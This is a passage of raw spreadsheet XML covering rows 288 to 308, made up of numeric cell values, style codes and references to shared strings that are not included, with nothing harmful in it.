      </c>
      <c r="X288" s="6">
        <v>2.0</v>
      </c>
      <c r="Y288" s="6">
        <v>0.0</v>
      </c>
      <c r="Z288" s="6">
        <v>0.0</v>
      </c>
      <c r="AA288" s="7"/>
      <c r="AB288" s="7"/>
      <c r="AC288" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE288" s="8"/>
      <c r="AF288" s="15"/>
    </row>
    <row r="289">
      <c r="A289" s="6">
        <f t="shared" si="1"/>
        <v>0.001896914396</v>
      </c>
      <c r="B289" s="6">
        <v>3732693.0</v>
      </c>
      <c r="C289" s="6">
        <v>1.0</v>
      </c>
      <c r="D289" s="6">
        <v>5745887.0</v>
      </c>
      <c r="E289" s="8"/>
      <c r="F289" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G289" s="8"/>
      <c r="H289" s="6">
        <v>2.0</v>
      </c>
      <c r="I289" s="6">
        <v>298.0</v>
      </c>
      <c r="J289" s="20"/>
      <c r="K289" s="20"/>
      <c r="L289" s="20"/>
      <c r="M289" s="20"/>
      <c r="N289" s="20"/>
      <c r="O289" s="4" t="s">
        <v>950</v>
      </c>
      <c r="P289" s="4" t="s">
        <v>951</v>
      </c>
      <c r="Q289" s="6">
        <v>283430.0</v>
      </c>
      <c r="R289" s="8"/>
      <c r="S289" s="6">
        <v>283430.0</v>
      </c>
      <c r="T289" s="8"/>
      <c r="U289" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V289" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W289" s="2" t="s">
        <v>952</v>
      </c>
      <c r="X289" s="6">
        <v>1.0</v>
      </c>
      <c r="Y289" s="6">
        <v>1.0</v>
      </c>
      <c r="Z289" s="8"/>
      <c r="AA289" s="8"/>
      <c r="AB289" s="8"/>
      <c r="AC289" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE289" s="8"/>
      <c r="AF289" s="14"/>
    </row>
    <row r="290">
      <c r="A290" s="6">
        <f t="shared" si="1"/>
        <v>0.9260497844</v>
      </c>
      <c r="B290" s="6">
        <v>5.7442439E7</v>
      </c>
      <c r="C290" s="6">
        <v>1.0</v>
      </c>
      <c r="D290" s="8"/>
      <c r="E290" s="8"/>
      <c r="F290" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G290" s="8"/>
      <c r="H290" s="6">
        <v>0.0</v>
      </c>
      <c r="I290" s="6">
        <v>467.0</v>
      </c>
      <c r="J290" s="17"/>
      <c r="K290" s="17"/>
      <c r="L290" s="17"/>
      <c r="M290" s="17"/>
      <c r="N290" s="17"/>
      <c r="O290" s="4" t="s">
        <v>953</v>
      </c>
      <c r="P290" s="4" t="s">
        <v>954</v>
      </c>
      <c r="Q290" s="6">
        <v>1.12261E7</v>
      </c>
      <c r="R290" s="7"/>
      <c r="S290" s="6">
        <v>8422953.0</v>
      </c>
      <c r="T290" s="7"/>
      <c r="U290" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V290" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W290" s="2" t="s">
        <v>955</v>
      </c>
      <c r="X290" s="6">
        <v>1.0</v>
      </c>
      <c r="Y290" s="6">
        <v>0.0</v>
      </c>
      <c r="Z290" s="7"/>
      <c r="AA290" s="7"/>
      <c r="AB290" s="7"/>
      <c r="AC290" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE290" s="8"/>
      <c r="AF290" s="15"/>
    </row>
    <row r="291">
      <c r="A291" s="6">
        <f t="shared" si="1"/>
        <v>0.7491787675</v>
      </c>
      <c r="B291" s="6">
        <v>2.8405057E7</v>
      </c>
      <c r="C291" s="6">
        <v>1.0</v>
      </c>
      <c r="D291" s="7"/>
      <c r="E291" s="8"/>
      <c r="F291" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G291" s="8"/>
      <c r="H291" s="6">
        <v>2.0</v>
      </c>
      <c r="I291" s="6">
        <v>164.0</v>
      </c>
      <c r="J291" s="17"/>
      <c r="K291" s="17"/>
      <c r="L291" s="17"/>
      <c r="M291" s="17"/>
      <c r="N291" s="17"/>
      <c r="O291" s="4" t="s">
        <v>956</v>
      </c>
      <c r="P291" s="4" t="s">
        <v>957</v>
      </c>
      <c r="Q291" s="6">
        <v>4545331.0</v>
      </c>
      <c r="R291" s="7"/>
      <c r="S291" s="7"/>
      <c r="T291" s="7"/>
      <c r="U291" s="8"/>
      <c r="V291" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W291" s="2" t="s">
        <v>958</v>
      </c>
      <c r="X291" s="6">
        <v>1.0</v>
      </c>
      <c r="Y291" s="6">
        <v>0.0</v>
      </c>
      <c r="Z291" s="6">
        <v>0.0</v>
      </c>
      <c r="AA291" s="7"/>
      <c r="AB291" s="7"/>
      <c r="AC291" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE291" s="8"/>
      <c r="AF291" s="15"/>
    </row>
    <row r="292">
      <c r="A292" s="6">
        <f t="shared" si="1"/>
        <v>0.1479976234</v>
      </c>
      <c r="B292" s="6">
        <v>606099.0</v>
      </c>
      <c r="C292" s="6">
        <v>1.0</v>
      </c>
      <c r="D292" s="6">
        <v>606132.0</v>
      </c>
      <c r="E292" s="8"/>
      <c r="F292" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G292" s="8"/>
      <c r="H292" s="6">
        <v>5.0</v>
      </c>
      <c r="I292" s="6">
        <v>7525.0</v>
      </c>
      <c r="J292" s="17"/>
      <c r="K292" s="17"/>
      <c r="L292" s="17"/>
      <c r="M292" s="17"/>
      <c r="N292" s="17"/>
      <c r="O292" s="4" t="s">
        <v>959</v>
      </c>
      <c r="P292" s="4" t="s">
        <v>960</v>
      </c>
      <c r="Q292" s="6">
        <v>1585.0</v>
      </c>
      <c r="R292" s="2" t="s">
        <v>961</v>
      </c>
      <c r="S292" s="6">
        <v>1585.0</v>
      </c>
      <c r="T292" s="2" t="s">
        <v>961</v>
      </c>
      <c r="U292" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V292" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W292" s="2" t="s">
        <v>962</v>
      </c>
      <c r="X292" s="6">
        <v>2.0</v>
      </c>
      <c r="Y292" s="6">
        <v>0.0</v>
      </c>
      <c r="Z292" s="6">
        <v>0.0</v>
      </c>
      <c r="AA292" s="7"/>
      <c r="AB292" s="7"/>
      <c r="AC292" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE292" s="8"/>
      <c r="AF292" s="15"/>
    </row>
    <row r="293">
      <c r="A293" s="6">
        <f t="shared" si="1"/>
        <v>0.7867197688</v>
      </c>
      <c r="B293" s="6">
        <v>5.9883242E7</v>
      </c>
      <c r="C293" s="6">
        <v>1.0</v>
      </c>
      <c r="D293" s="7"/>
      <c r="E293" s="8"/>
      <c r="F293" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G293" s="8"/>
      <c r="H293" s="6">
        <v>0.0</v>
      </c>
      <c r="I293" s="6">
        <v>25.0</v>
      </c>
      <c r="J293" s="17"/>
      <c r="K293" s="17"/>
      <c r="L293" s="17"/>
      <c r="M293" s="17"/>
      <c r="N293" s="17"/>
      <c r="O293" s="4" t="s">
        <v>963</v>
      </c>
      <c r="P293" s="4" t="s">
        <v>964</v>
      </c>
      <c r="Q293" s="6">
        <v>1.2560868E7</v>
      </c>
      <c r="R293" s="7"/>
      <c r="S293" s="6">
        <v>181144.0</v>
      </c>
      <c r="T293" s="7"/>
      <c r="U293" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V293" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W293" s="2" t="s">
        <v>965</v>
      </c>
      <c r="X293" s="6">
        <v>0.0</v>
      </c>
      <c r="Y293" s="6">
        <v>2.0</v>
      </c>
      <c r="Z293" s="7"/>
      <c r="AA293" s="7"/>
      <c r="AB293" s="7"/>
      <c r="AC293" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE293" s="8"/>
      <c r="AF293" s="15"/>
    </row>
    <row r="294">
      <c r="A294" s="6">
        <f t="shared" si="1"/>
        <v>0.4422909472</v>
      </c>
      <c r="B294" s="6">
        <v>5.3637444E7</v>
      </c>
      <c r="C294" s="6">
        <v>1.0</v>
      </c>
      <c r="D294" s="8"/>
      <c r="E294" s="8"/>
      <c r="F294" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G294" s="8"/>
      <c r="H294" s="6">
        <v>0.0</v>
      </c>
      <c r="I294" s="6">
        <v>3780.0</v>
      </c>
      <c r="J294" s="20"/>
      <c r="K294" s="20"/>
      <c r="L294" s="20"/>
      <c r="M294" s="20"/>
      <c r="N294" s="20"/>
      <c r="O294" s="4" t="s">
        <v>966</v>
      </c>
      <c r="P294" s="4" t="s">
        <v>967</v>
      </c>
      <c r="Q294" s="6">
        <v>1.0717866E7</v>
      </c>
      <c r="R294" s="8"/>
      <c r="S294" s="8"/>
      <c r="T294" s="8"/>
      <c r="U294" s="8"/>
      <c r="V294" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W294" s="2" t="s">
        <v>968</v>
      </c>
      <c r="X294" s="6">
        <v>3.0</v>
      </c>
      <c r="Y294" s="6">
        <v>0.0</v>
      </c>
      <c r="Z294" s="8"/>
      <c r="AA294" s="8"/>
      <c r="AB294" s="8"/>
      <c r="AC294" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE294" s="8"/>
      <c r="AF294" s="14"/>
    </row>
    <row r="295">
      <c r="A295" s="6">
        <f t="shared" si="1"/>
        <v>0.9045645699</v>
      </c>
      <c r="B295" s="6">
        <v>1.6268314E7</v>
      </c>
      <c r="C295" s="6">
        <v>1.0</v>
      </c>
      <c r="D295" s="7"/>
      <c r="E295" s="8"/>
      <c r="F295" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G295" s="8"/>
      <c r="H295" s="6">
        <v>1.0</v>
      </c>
      <c r="I295" s="6">
        <v>293.0</v>
      </c>
      <c r="J295" s="17"/>
      <c r="K295" s="17"/>
      <c r="L295" s="17"/>
      <c r="M295" s="17"/>
      <c r="N295" s="17"/>
      <c r="O295" s="4" t="s">
        <v>969</v>
      </c>
      <c r="P295" s="4" t="s">
        <v>970</v>
      </c>
      <c r="Q295" s="6">
        <v>2329982.0</v>
      </c>
      <c r="R295" s="7"/>
      <c r="S295" s="6">
        <v>830012.0</v>
      </c>
      <c r="T295" s="7"/>
      <c r="U295" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V295" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W295" s="2" t="s">
        <v>971</v>
      </c>
      <c r="X295" s="6">
        <v>1.0</v>
      </c>
      <c r="Y295" s="6">
        <v>1.0</v>
      </c>
      <c r="Z295" s="7"/>
      <c r="AA295" s="7"/>
      <c r="AB295" s="7"/>
      <c r="AC295" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE295" s="8"/>
      <c r="AF295" s="15"/>
    </row>
    <row r="296">
      <c r="A296" s="6">
        <f t="shared" si="1"/>
        <v>0.5845627242</v>
      </c>
      <c r="B296" s="6">
        <v>2561521.0</v>
      </c>
      <c r="C296" s="6">
        <v>1.0</v>
      </c>
      <c r="D296" s="6">
        <v>2562387.0</v>
      </c>
      <c r="E296" s="8"/>
      <c r="F296" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G296" s="8"/>
      <c r="H296" s="6">
        <v>2.0</v>
      </c>
      <c r="I296" s="6">
        <v>302.0</v>
      </c>
      <c r="J296" s="17"/>
      <c r="K296" s="17"/>
      <c r="L296" s="17"/>
      <c r="M296" s="17"/>
      <c r="N296" s="17"/>
      <c r="O296" s="4" t="s">
        <v>972</v>
      </c>
      <c r="P296" s="4" t="s">
        <v>973</v>
      </c>
      <c r="Q296" s="6">
        <v>22216.0</v>
      </c>
      <c r="R296" s="7"/>
      <c r="S296" s="6">
        <v>22216.0</v>
      </c>
      <c r="T296" s="7"/>
      <c r="U296" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V296" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W296" s="2" t="s">
        <v>974</v>
      </c>
      <c r="X296" s="6">
        <v>1.0</v>
      </c>
      <c r="Y296" s="6">
        <v>3.0</v>
      </c>
      <c r="Z296" s="7"/>
      <c r="AA296" s="7"/>
      <c r="AB296" s="7"/>
      <c r="AC296" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE296" s="8"/>
      <c r="AF296" s="15"/>
    </row>
    <row r="297">
      <c r="A297" s="6">
        <f t="shared" si="1"/>
        <v>0.9346967525</v>
      </c>
      <c r="B297" s="6">
        <v>1.9664021E7</v>
      </c>
      <c r="C297" s="6">
        <v>1.0</v>
      </c>
      <c r="D297" s="7"/>
      <c r="E297" s="8"/>
      <c r="F297" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G297" s="8"/>
      <c r="H297" s="6">
        <v>0.0</v>
      </c>
      <c r="I297" s="6">
        <v>142.0</v>
      </c>
      <c r="J297" s="17"/>
      <c r="K297" s="17"/>
      <c r="L297" s="17"/>
      <c r="M297" s="17"/>
      <c r="N297" s="17"/>
      <c r="O297" s="4" t="s">
        <v>975</v>
      </c>
      <c r="P297" s="4" t="s">
        <v>976</v>
      </c>
      <c r="Q297" s="6">
        <v>776456.0</v>
      </c>
      <c r="R297" s="7"/>
      <c r="S297" s="6">
        <v>776456.0</v>
      </c>
      <c r="T297" s="7"/>
      <c r="U297" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V297" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W297" s="2" t="s">
        <v>977</v>
      </c>
      <c r="X297" s="6">
        <v>1.0</v>
      </c>
      <c r="Y297" s="6">
        <v>0.0</v>
      </c>
      <c r="Z297" s="7"/>
      <c r="AA297" s="7"/>
      <c r="AB297" s="7"/>
      <c r="AC297" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE297" s="7"/>
      <c r="AF297" s="15"/>
    </row>
    <row r="298">
      <c r="A298" s="6">
        <f t="shared" si="1"/>
        <v>0.6246814136</v>
      </c>
      <c r="B298" s="6">
        <v>2.6734161E7</v>
      </c>
      <c r="C298" s="6">
        <v>1.0</v>
      </c>
      <c r="D298" s="6">
        <v>2.6735957E7</v>
      </c>
      <c r="E298" s="8"/>
      <c r="F298" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G298" s="8"/>
      <c r="H298" s="6">
        <v>2.0</v>
      </c>
      <c r="I298" s="6">
        <v>960.0</v>
      </c>
      <c r="J298" s="20"/>
      <c r="K298" s="20"/>
      <c r="L298" s="20"/>
      <c r="M298" s="20"/>
      <c r="N298" s="20"/>
      <c r="O298" s="4" t="s">
        <v>978</v>
      </c>
      <c r="P298" s="4" t="s">
        <v>979</v>
      </c>
      <c r="Q298" s="6">
        <v>2385820.0</v>
      </c>
      <c r="R298" s="8"/>
      <c r="S298" s="8"/>
      <c r="T298" s="8"/>
      <c r="U298" s="8"/>
      <c r="V298" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W298" s="2" t="s">
        <v>980</v>
      </c>
      <c r="X298" s="6">
        <v>2.0</v>
      </c>
      <c r="Y298" s="6">
        <v>0.0</v>
      </c>
      <c r="Z298" s="8"/>
      <c r="AA298" s="8"/>
      <c r="AB298" s="8"/>
      <c r="AC298" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE298" s="8"/>
      <c r="AF298" s="14"/>
    </row>
    <row r="299">
      <c r="A299" s="6">
        <f t="shared" si="1"/>
        <v>0.2406441697</v>
      </c>
      <c r="B299" s="6">
        <v>5239566.0</v>
      </c>
      <c r="C299" s="6">
        <v>1.0</v>
      </c>
      <c r="D299" s="6">
        <v>5239618.0</v>
      </c>
      <c r="E299" s="8"/>
      <c r="F299" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G299" s="8"/>
      <c r="H299" s="6">
        <v>1.0</v>
      </c>
      <c r="I299" s="6">
        <v>304.0</v>
      </c>
      <c r="J299" s="17"/>
      <c r="K299" s="17"/>
      <c r="L299" s="17"/>
      <c r="M299" s="17"/>
      <c r="N299" s="17"/>
      <c r="O299" s="4" t="s">
        <v>981</v>
      </c>
      <c r="P299" s="4" t="s">
        <v>982</v>
      </c>
      <c r="Q299" s="6">
        <v>650638.0</v>
      </c>
      <c r="R299" s="7"/>
      <c r="S299" s="6">
        <v>650638.0</v>
      </c>
      <c r="T299" s="7"/>
      <c r="U299" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V299" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W299" s="2" t="s">
        <v>983</v>
      </c>
      <c r="X299" s="6">
        <v>1.0</v>
      </c>
      <c r="Y299" s="6">
        <v>0.0</v>
      </c>
      <c r="Z299" s="7"/>
      <c r="AA299" s="7"/>
      <c r="AB299" s="7"/>
      <c r="AC299" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE299" s="8"/>
      <c r="AF299" s="15"/>
    </row>
    <row r="300">
      <c r="A300" s="6">
        <f t="shared" si="1"/>
        <v>0.9566804635</v>
      </c>
      <c r="B300" s="6">
        <v>4579028.0</v>
      </c>
      <c r="C300" s="6">
        <v>1.0</v>
      </c>
      <c r="D300" s="6">
        <v>4579061.0</v>
      </c>
      <c r="E300" s="8"/>
      <c r="F300" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G300" s="8"/>
      <c r="H300" s="6">
        <v>3.0</v>
      </c>
      <c r="I300" s="6">
        <v>1670.0</v>
      </c>
      <c r="J300" s="17"/>
      <c r="K300" s="17"/>
      <c r="L300" s="17"/>
      <c r="M300" s="17"/>
      <c r="N300" s="17"/>
      <c r="O300" s="4" t="s">
        <v>984</v>
      </c>
      <c r="P300" s="4" t="s">
        <v>985</v>
      </c>
      <c r="Q300" s="6">
        <v>496852.0</v>
      </c>
      <c r="R300" s="7"/>
      <c r="S300" s="7"/>
      <c r="T300" s="7"/>
      <c r="U300" s="8"/>
      <c r="V300" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W300" s="2" t="s">
        <v>986</v>
      </c>
      <c r="X300" s="6">
        <v>2.0</v>
      </c>
      <c r="Y300" s="6">
        <v>0.0</v>
      </c>
      <c r="Z300" s="7"/>
      <c r="AA300" s="7"/>
      <c r="AB300" s="7"/>
      <c r="AC300" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE300" s="8"/>
      <c r="AF300" s="15"/>
    </row>
    <row r="301">
      <c r="A301" s="6">
        <f t="shared" si="1"/>
        <v>0.5851681363</v>
      </c>
      <c r="B301" s="6">
        <v>7.0847272E7</v>
      </c>
      <c r="C301" s="6">
        <v>1.0</v>
      </c>
      <c r="D301" s="8"/>
      <c r="E301" s="8"/>
      <c r="F301" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G301" s="8"/>
      <c r="H301" s="6">
        <v>4.0</v>
      </c>
      <c r="I301" s="6">
        <v>328.0</v>
      </c>
      <c r="J301" s="20"/>
      <c r="K301" s="20"/>
      <c r="L301" s="20"/>
      <c r="M301" s="20"/>
      <c r="N301" s="20"/>
      <c r="O301" s="4" t="s">
        <v>987</v>
      </c>
      <c r="P301" s="4" t="s">
        <v>988</v>
      </c>
      <c r="Q301" s="6">
        <v>777285.0</v>
      </c>
      <c r="R301" s="8"/>
      <c r="S301" s="6">
        <v>112976.0</v>
      </c>
      <c r="T301" s="8"/>
      <c r="U301" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V301" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W301" s="2" t="s">
        <v>989</v>
      </c>
      <c r="X301" s="6">
        <v>1.0</v>
      </c>
      <c r="Y301" s="6">
        <v>0.0</v>
      </c>
      <c r="Z301" s="6">
        <v>0.0</v>
      </c>
      <c r="AA301" s="8"/>
      <c r="AB301" s="8"/>
      <c r="AC301" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE301" s="8"/>
      <c r="AF301" s="14"/>
    </row>
    <row r="302">
      <c r="A302" s="6">
        <f t="shared" si="1"/>
        <v>0.8258713602</v>
      </c>
      <c r="B302" s="6">
        <v>6.519422E7</v>
      </c>
      <c r="C302" s="6">
        <v>1.0</v>
      </c>
      <c r="D302" s="6">
        <v>6.5194255E7</v>
      </c>
      <c r="E302" s="8"/>
      <c r="F302" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G302" s="8"/>
      <c r="H302" s="6">
        <v>0.0</v>
      </c>
      <c r="I302" s="6">
        <v>516.0</v>
      </c>
      <c r="J302" s="20"/>
      <c r="K302" s="20"/>
      <c r="L302" s="20"/>
      <c r="M302" s="20"/>
      <c r="N302" s="20"/>
      <c r="O302" s="4" t="s">
        <v>990</v>
      </c>
      <c r="P302" s="4" t="s">
        <v>991</v>
      </c>
      <c r="Q302" s="6">
        <v>4123522.0</v>
      </c>
      <c r="R302" s="8"/>
      <c r="S302" s="8"/>
      <c r="T302" s="8"/>
      <c r="U302" s="8"/>
      <c r="V302" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W302" s="2" t="s">
        <v>992</v>
      </c>
      <c r="X302" s="6">
        <v>1.0</v>
      </c>
      <c r="Y302" s="6">
        <v>1.0</v>
      </c>
      <c r="Z302" s="8"/>
      <c r="AA302" s="9" t="s">
        <v>30</v>
      </c>
      <c r="AB302" s="8"/>
      <c r="AC302" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE302" s="8"/>
      <c r="AF302" s="14"/>
    </row>
    <row r="303">
      <c r="A303" s="6">
        <f t="shared" si="1"/>
        <v>0.6860859498</v>
      </c>
      <c r="B303" s="6">
        <v>2.7530108E7</v>
      </c>
      <c r="C303" s="6">
        <v>1.0</v>
      </c>
      <c r="D303" s="6">
        <v>2.7530781E7</v>
      </c>
      <c r="E303" s="8"/>
      <c r="F303" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G303" s="8"/>
      <c r="H303" s="6">
        <v>2.0</v>
      </c>
      <c r="I303" s="6">
        <v>289.0</v>
      </c>
      <c r="J303" s="20"/>
      <c r="K303" s="20"/>
      <c r="L303" s="20"/>
      <c r="M303" s="20"/>
      <c r="N303" s="20"/>
      <c r="O303" s="4" t="s">
        <v>993</v>
      </c>
      <c r="P303" s="4" t="s">
        <v>994</v>
      </c>
      <c r="Q303" s="8"/>
      <c r="R303" s="2" t="s">
        <v>995</v>
      </c>
      <c r="T303" s="8"/>
      <c r="U303" s="8"/>
      <c r="V303" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W303" s="2" t="s">
        <v>996</v>
      </c>
      <c r="X303" s="6">
        <v>1.0</v>
      </c>
      <c r="Y303" s="6">
        <v>4.0</v>
      </c>
      <c r="Z303" s="6">
        <v>0.0</v>
      </c>
      <c r="AA303" s="8"/>
      <c r="AB303" s="8"/>
      <c r="AC303" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE303" s="8"/>
      <c r="AF303" s="14"/>
    </row>
    <row r="304">
      <c r="A304" s="6">
        <f t="shared" si="1"/>
        <v>0.05451249229</v>
      </c>
      <c r="B304" s="6">
        <v>1.493995E7</v>
      </c>
      <c r="C304" s="6">
        <v>1.0</v>
      </c>
      <c r="D304" s="6">
        <v>1.4941397E7</v>
      </c>
      <c r="E304" s="8"/>
      <c r="F304" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G304" s="8"/>
      <c r="H304" s="6">
        <v>0.0</v>
      </c>
      <c r="I304" s="6">
        <v>150.0</v>
      </c>
      <c r="J304" s="17"/>
      <c r="K304" s="17"/>
      <c r="L304" s="17"/>
      <c r="M304" s="17"/>
      <c r="N304" s="17"/>
      <c r="O304" s="4" t="s">
        <v>997</v>
      </c>
      <c r="P304" s="4" t="s">
        <v>998</v>
      </c>
      <c r="Q304" s="6">
        <v>2083803.0</v>
      </c>
      <c r="R304" s="7"/>
      <c r="S304" s="6">
        <v>367456.0</v>
      </c>
      <c r="T304" s="7"/>
      <c r="U304" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V304" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W304" s="2" t="s">
        <v>999</v>
      </c>
      <c r="X304" s="6">
        <v>1.0</v>
      </c>
      <c r="Y304" s="6">
        <v>0.0</v>
      </c>
      <c r="Z304" s="6">
        <v>0.0</v>
      </c>
      <c r="AA304" s="7"/>
      <c r="AB304" s="7"/>
      <c r="AC304" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE304" s="7"/>
      <c r="AF304" s="15"/>
    </row>
    <row r="305">
      <c r="A305" s="6">
        <f t="shared" si="1"/>
        <v>0.31742915</v>
      </c>
      <c r="B305" s="6">
        <v>5.8497007E7</v>
      </c>
      <c r="C305" s="6">
        <v>1.0</v>
      </c>
      <c r="D305" s="6">
        <v>5.8497223E7</v>
      </c>
      <c r="E305" s="8"/>
      <c r="F305" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G305" s="8"/>
      <c r="H305" s="6">
        <v>1.0</v>
      </c>
      <c r="I305" s="6">
        <v>648.0</v>
      </c>
      <c r="J305" s="20"/>
      <c r="K305" s="20"/>
      <c r="L305" s="20"/>
      <c r="M305" s="20"/>
      <c r="N305" s="20"/>
      <c r="O305" s="4" t="s">
        <v>1000</v>
      </c>
      <c r="P305" s="4" t="s">
        <v>1001</v>
      </c>
      <c r="Q305" s="6">
        <v>4864925.0</v>
      </c>
      <c r="R305" s="8"/>
      <c r="S305" s="8"/>
      <c r="T305" s="8"/>
      <c r="U305" s="8"/>
      <c r="V305" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W305" s="2" t="s">
        <v>1002</v>
      </c>
      <c r="X305" s="6">
        <v>1.0</v>
      </c>
      <c r="Y305" s="6">
        <v>0.0</v>
      </c>
      <c r="Z305" s="6">
        <v>0.0</v>
      </c>
      <c r="AA305" s="8"/>
      <c r="AB305" s="8"/>
      <c r="AC305" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE305" s="8"/>
      <c r="AF305" s="14"/>
    </row>
    <row r="306">
      <c r="A306" s="6">
        <f t="shared" si="1"/>
        <v>0.931411756</v>
      </c>
      <c r="B306" s="6">
        <v>6.6754635E7</v>
      </c>
      <c r="C306" s="6">
        <v>1.0</v>
      </c>
      <c r="D306" s="8"/>
      <c r="E306" s="8"/>
      <c r="F306" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G306" s="8"/>
      <c r="H306" s="6">
        <v>0.0</v>
      </c>
      <c r="I306" s="6">
        <v>849.0</v>
      </c>
      <c r="J306" s="17"/>
      <c r="K306" s="17"/>
      <c r="L306" s="17"/>
      <c r="M306" s="17"/>
      <c r="N306" s="17"/>
      <c r="O306" s="4" t="s">
        <v>1003</v>
      </c>
      <c r="P306" s="4" t="s">
        <v>1004</v>
      </c>
      <c r="Q306" s="6">
        <v>7753521.0</v>
      </c>
      <c r="R306" s="7"/>
      <c r="S306" s="7"/>
      <c r="T306" s="7"/>
      <c r="U306" s="8"/>
      <c r="V306" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W306" s="2" t="s">
        <v>1005</v>
      </c>
      <c r="X306" s="6">
        <v>1.0</v>
      </c>
      <c r="Y306" s="6">
        <v>0.0</v>
      </c>
      <c r="Z306" s="7"/>
      <c r="AA306" s="7"/>
      <c r="AB306" s="7"/>
      <c r="AC306" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE306" s="8"/>
      <c r="AF306" s="15"/>
    </row>
    <row r="307">
      <c r="A307" s="6">
        <f t="shared" si="1"/>
        <v>0.8872103811</v>
      </c>
      <c r="B307" s="6">
        <v>5.1290461E7</v>
      </c>
      <c r="C307" s="6">
        <v>1.0</v>
      </c>
      <c r="D307" s="8"/>
      <c r="E307" s="8"/>
      <c r="F307" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G307" s="8"/>
      <c r="H307" s="6">
        <v>0.0</v>
      </c>
      <c r="I307" s="6">
        <v>218.0</v>
      </c>
      <c r="J307" s="20"/>
      <c r="K307" s="20"/>
      <c r="L307" s="20"/>
      <c r="M307" s="20"/>
      <c r="N307" s="20"/>
      <c r="O307" s="4" t="s">
        <v>1006</v>
      </c>
      <c r="P307" s="4" t="s">
        <v>1007</v>
      </c>
      <c r="Q307" s="6">
        <v>1209926.0</v>
      </c>
      <c r="R307" s="8"/>
      <c r="S307" s="6">
        <v>9337071.0</v>
      </c>
      <c r="T307" s="8"/>
      <c r="U307" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V307" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W307" s="2" t="s">
        <v>1008</v>
      </c>
      <c r="X307" s="6">
        <v>0.0</v>
      </c>
      <c r="Y307" s="6">
        <v>3.0</v>
      </c>
      <c r="Z307" s="8"/>
      <c r="AA307" s="8"/>
      <c r="AB307" s="8"/>
      <c r="AC307" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE307" s="8"/>
      <c r="AF307" s="14"/>
    </row>
    <row r="308">
      <c r="A308" s="6">
        <f t="shared" si="1"/>
        <v>0.6073282752</v>
      </c>
      <c r="B308" s="6">
        <v>3.4735549E7</v>
      </c>
      <c r="C308" s="6">
        <v>1.0</v>
      </c>
      <c r="D308" s="8"/>
      <c r="E308" s="8"/>
      <c r="F308" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G308" s="8"/>
      <c r="H308" s="6">
        <v>1.0</v>
      </c>
      <c r="I308" s="6">
        <v>973.0</v>
      </c>
      <c r="J308" s="20"/>
      <c r="K308" s="20"/>
      <c r="L308" s="20"/>
      <c r="M308" s="20"/>
      <c r="N308" s="20"/>
      <c r="O308" s="4" t="s">
        <v>1009</v>
      </c>
      <c r="P308" s="4" t="s">
        <v>1010</v>
      </c>
      <c r="Q308" s="6">
        <v>5776700.0</v>
      </c>
      <c r="R308" s="8"/>
      <c r="S308" s="8"/>
      <c r="T308" s="8"/>
      <c r="U308" s="8"/>
      <c r="V308" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W308" s="2" t="s">
